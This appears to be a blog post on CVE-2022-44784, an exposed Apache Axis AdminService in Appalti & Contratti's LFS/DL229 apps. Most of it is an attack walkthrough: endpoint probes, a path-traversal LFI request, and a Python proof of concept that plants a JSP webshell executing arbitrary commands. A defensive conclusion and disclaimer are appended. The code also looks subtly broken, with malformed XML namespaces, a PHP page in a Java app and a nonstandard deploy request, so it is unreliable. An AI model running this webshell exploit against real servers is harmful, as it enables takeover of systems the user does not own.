CVE-2022-44784 - Remote Arbitrary Service Creation & Code Execution in Appalti & Contratti (LFS / DL229) via Exposed Axis AdminService

In 2022, a critical vulnerability was discovered in Appalti & Contratti version 9.12.2, within its widely used web applications LFS and DL229. The core issue is the unsafe remote exposure of Apache Axis AdminService, a component that should NOT be accessible from outside the localhost. Instead, due to insecure default configs and leaked info via a Local File Inclusion (LFI) bug, remote attackers can install malicious services (including webshells) and gain complete control of the server.

This post guides you through the vulnerability, shows easy-to-understand exploit code, and links to original resources for deeper dives.

Context: What is Apache Axis and AdminService?

Axis 1.4 is a popular (but now outdated) web service (SOAP) engine. When embedded in webapps, it provides a management console called AdminService. By design, AdminService should be accessible only from localhost for obvious security reasons, as it lets you add or modify web services programmatically.

Appalti & Contratti bundled Axis 1.4 directly into their webapps in such a way that these services, including AdminService, became accessible to remote users — a massive attack surface.

Axis AdminService is supposed to be "localhost-only", but LFS & DL229 allow remote access.

2. Via leaked WEB-INF/web.xml (through LFI vulnerability), attackers can confirm the Axis endpoints and configuration.
3. Via AdminService, attackers can deploy arbitrary Axis services — in particular, they can use LogHandler to write files (JSP webshell) to the webroot.

Try to access

http(s)://TARGET/LFS/servlet/AxisServlet
http(s)://TARGET/DL229/servlet/AxisServlet

Or more specifically, test the admin service endpoint

http(s)://TARGET/LFS/services/AdminService

If it responds, the service is exposed.

Check for Local File Inclusion (LFI). For example

http(s)://TARGET/LFS/index.php?page=../../WEB-INF/web.xml

This can reveal the Axis servlet mapping, confirming the embedded Axis 1.4 instance.

3. Deploying Your Own Web Service (Write JSP Webshell)

We abuse a feature of Axis: org.apache.axis.handlers.LogHandler lets you specify a file path to write logs to. If we set a path ending in .jsp and write our JSP payload as the log message, we get remote code execution.

Step-by-Step Exploit

- Craft a malicious 'AdminService' SOAP request to deploy a new LogHandler pointing to a writable directory (e.g., webroot).

Example SOAP Request to Deploy the LogHandler

Below is a minimal Python PoC using requests. This will drop a webshell shell.jsp into the webroot:

import requests

TARGET = "http://victim.com/LFS/services/AdminService";
WEBAPP_PATH = "/var/lib/tomcat/webapps/LFS/"  # adjust based on info from web.xml
SHELL_NAME = "shell.jsp"
WEB_SHELL_PATH = WEBAPP_PATH + SHELL_NAME

# 1. Craft the SOAP to install the malicious LogHandler
SOAP = f"""
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"; xmlns:admin="AdminService">
  <soapenv:Header/>
  <soapenv:Body>
    <admin:deployHandler>
      <handlerName>myLogger</handlerName>
      <className>org.apache.axis.handlers.LogHandler</className>
      <option>
        <name>LogHandler.fileName</name>
        <value>{WEB_SHELL_PATH}</value>
      </option>
      <option>
        <name>LogHandler.writeToConsole</name><value>false</value>
      </option>
      <option>
        <name>LogHandler.treshold</name><value>INFO</value>
      </option>
    </admin:deployHandler>
  </soapenv:Body>
</soapenv:Envelope>
"""

# 2. Send the AdminService deployment
headers = {'Content-Type': 'text/xml'}
resp = requests.post(TARGET, data=SOAP, headers=headers)
print("DeployHandler response:", resp.text)

# 3. Write JSP shell using SOAP to log a JSP payload
JSP_PAYLOAD = '<%if(request.getParameter("cmd")!=null){{out.println(new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("\\\\A").next());}}%>'

log_soap = f"""
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"; xmlns:ns="urn:LogHandlerService">
  <soapenv:Header/>
  <soapenv:Body>
    <ns:log>
      <in>{JSP_PAYLOAD}</in>
    </ns:log>
  </soapenv:Body>
</soapenv:Envelope>
"""

resp2 = requests.post(TARGET.replace("AdminService", "myLogger"), data=log_soap, headers=headers)
print("LogHandler invocation response:", resp2.text)

# 4. Visit the shell: http://victim.com/LFS/shell.jsp?cmd=whoami

Now visit

http://victim.com/LFS/shell.jsp?cmd=whoami

You should see the username under which Tomcat runs.

References & Further Reading

- Axis SSRF to RCE (Generic AXIS-SSRF exploitation method)
- CVE-2022-44784 at NIST/NVD
- Axis AdminService File Write Exploit Example
- Axis 1.4 Documentation
- Generic Axis AdminService Exploitation

Conclusion

CVE-2022-44784 is a classic example of how legacy components embedded into bigger platforms can easily create security holes that allow remote attackers to take full control of systems. If your installation exposes Axis AdminService remotely, act immediately — the exploit is trivial and well-known.

*Always secure your admin interfaces, limit file inclusion flaws, and upgrade unsupported software.*


*This article is original and independent, aimed at helping sysadmins and developers secure their systems by understanding real-world vulnerabilities.*

Disclaimer

*This information is for educational purposes only. Do not exploit systems you do not own or have permission to test.*

Timeline

Published on: 11/21/2022 23:15:00 UTC
Last modified on: 11/23/2022 20:00:00 UTC